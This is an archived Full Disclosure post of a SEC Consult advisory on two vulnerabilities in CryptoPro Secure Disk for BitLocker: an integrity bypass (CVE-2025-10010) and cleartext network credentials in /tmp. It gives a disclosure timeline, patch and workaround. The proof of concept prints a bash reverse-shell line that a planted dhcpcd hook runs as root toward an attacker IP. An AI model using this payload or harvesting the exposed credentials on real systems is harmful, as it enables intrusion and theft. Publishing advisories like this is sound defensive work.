Full Disclosure mailing list archives

SEC Consult Vulnerability Lab Security Advisory < 20260224-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: CPSD CryptoPro Secure Disk for BitLocker
 vulnerable version: 7.6.4.16432 (76212)
      fixed version: 7.6.6 / 7.7.1
         CVE number: CVE-2025-10010
             impact: high
           homepage:https://www.cpsd.at
              found: 2025-04-14
                 by: Gorazd Jank (Office Vienna)
                     Stefan Viehböck
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Atos business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
(German)
"Das Team von CPSD entwickelt hochwertige Verschlüsselungslösungen für
sicherheitsbewusste Unternehmen. Seit über 15 Jahren stehen die CryptoPro
Produkte für beste Kundenzufriedenheit durch einen ausgewogenen Mix aus
Sicherheit, Benutzerkomfort und minimale Verwaltung.

Ihre Sicherheitsanforderungen sind bei unseren Experten in besten Händen.
Die Erfahrung aus zahlreichen Kryptographie-Projekten teilen wir gerne und
empfehlen die optimale Verschlüsselungsstrategie. Lassen Sie sich von den
Vorteilen inspirieren!"

Source:https://www.cpsd.at/


Business recommendation:
------------------------
The vendor provides patches (7.6.6/7.7.1) for the affected software which
should be installed immediately if the devices are not already patched.

In cases where patching is not feasible it is possible to encrypt the PBA
partition to prevent changes. For detailed information see chapter
Workaround below.

SEC Consult highly recommends to perform a thorough security review of the product
conducted by security professionals to identify and resolve potential further
security issues.


Vulnerability overview/description:
-----------------------------------
1) Integrity Validation Bypass (CVE-2025-10010)
The CryptoPro Secure Disk application boots a small Linux operating system
to perform user authentication before using BitLocker to decrypt the Windows
partition. The system is located on a separate unencrypted partition which can
be reached by anyone with access to the hard disk.

Multiple checks are performed to validate the integrity of the Linux operating
system and the CryptoPro Secure Disk application files. When files are changed
an error is shown on system start. One of the checks is the Linux kernel's
Integrity Measurement Architecture (IMA). It was identified that configuration
files are not validated by the IMA and can then (if not checked by other
measures) be changed. This allows an attacker to execute arbitrary code in the
context of the root user and enables an attacker to e.g., plant a backdoor
and access data during execution.

2) Cleartext storage of sensitive data
CryptoPro Secure Disk allows users who have forgotten their credentials to
contact offline as well as online support. The online version needs to
establish a connection to the support server. For this purpose, it may connect
to a predefined LAN or WLAN.

If secrets (e.g., certificates, passwords, etc.) are needed to access these
networks the corresponding configurations and files are stored in the /tmp
folder in clear text. An attacker with access to the Linux operating system can
read the secrets and use them to potentially connect to an internal network.


Proof of concept:
-----------------
1) Integrity Validation Bypass (CVE-2025-10010)
An attacker can access the unencrypted partition on the hard disk by either
booting from an external medium (e.g., USB) or by removing the hard disk and
mounting it to another system. No authentication is needed.

To bypass the IMA and get arbitrary code execution an editable configuration
file is needed which supports the execution of code and will be executed by
the system. A service meeting these preconditions is the Dynamic Host
Configuration Protocol Daemon (dhcpd). It supports Enter- and Exit-Hooks,
which are basically bash scripts which are executed when the dhcpd service is
started or respectively exited. They are being called after the initiation of
the Linux operating system.

The vulnerability can be exploited by setting up a DHCP Enter-Hook with a reverse
shell. This can be done by generating the file /etc/dhcpcd.enter-hook with
following content:

------------------------------------------------------------------------------
#!/bin/bash

bash -c 'exec bash -i &>/dev/tcp/192.168.XXX.XXX/9999 <&1' &
------------------------------------------------------------------------------

The host and the receiver of the reverse shell must be connected to each other
e.g., using a router. After the restart of the host machine a connection is
opened to the attacker's host resulting in a reverse shell with root
privileges.


2) Cleartext storage of sensitive data
To exploit this vulnerability, access to the running CryptoPro Secure system is
needed e.g., through a reverse shell. When the online support is used, the
credentials for the network are stored in clear text in the /tmp folder.
Accessing it after the start of the application – without user interaction -
is sufficient to access this information.

The figure below shows certificates as well as configuration containing clear
text credentials for the certificates. It contains the user certificate
(host.pem) and user private key (priv.pem) including the clear text password,
which can be found inside of the "wlan_supplicant_conf.wlan0" file.
There is also a tls_certs.pfx file with clear text password without
known usage. This would allow an attacker to access a user WLAN and / or
bypass 802.1x protection.

<issue2_poc_cleartext_storage_01.png>


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
* 7.6.4.16432 (76212)


Vendor contact timeline:
------------------------
2025-06-04: Contacting vendor throughsupport () cpsd at
2025-06-04: Quick vendor response with request for information.
2025-06-10: Submission of advisory via secure platform.
2025-06-24: Response from vendor with workaround. Vendor-Clients will be informed
            and final fix will be released with version 7.6.6 / 7.7.1.
2025-06-27: Following up regarding the proposed fixed by the vendor regarding
            checksums.
2025-07-25: Information to vendor about start of advisory publication, sending
            current advisory draft to vendor.
2025-08-05: Vendor proposes adding the workaround to the business recommendation
            section.
2025-09-06: Asking the vendor when the patches have been provided to the customers.
2025-09-08: Reserving CVE-2025-10010. Vendor is still clarifying status with
            customers, requests delay of publication for a few months.
            Patch information was provided to customers on 12th August.
2026-02-19: Informing vendor about upcoming advisory release.
2026-02-24: Public release of security advisory.


Solution:
---------
The vendor provides a patch with version 7.6.6 / 7.7.1.
Encryption is activated by default starting with version 7.7.


Workaround:
-----------
Encryption of the PBA partition is possible (since version 7.6.0) and
prevents changing of the files as described in the advisory. Encryption
can be activated via "Client Security/Verschiedenes/PBA Linux Partition
verschlüsseln". Clients will be informed by the vendor about the risk if
the PBA partition is not encrypted.


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your applicationhttps://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local officeshttps://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web:https://www.sec-consult.com
Blog:https://blog.sec-consult.com
X:https://x.com/sec_consult

EOF Gorazd Jank / @2026

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• SEC Consult SA-20260224-0 :: Multiple vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker (CVE-2025-10010) SEC Consult Vulnerability Lab via Fulldisclosure (Mar 12)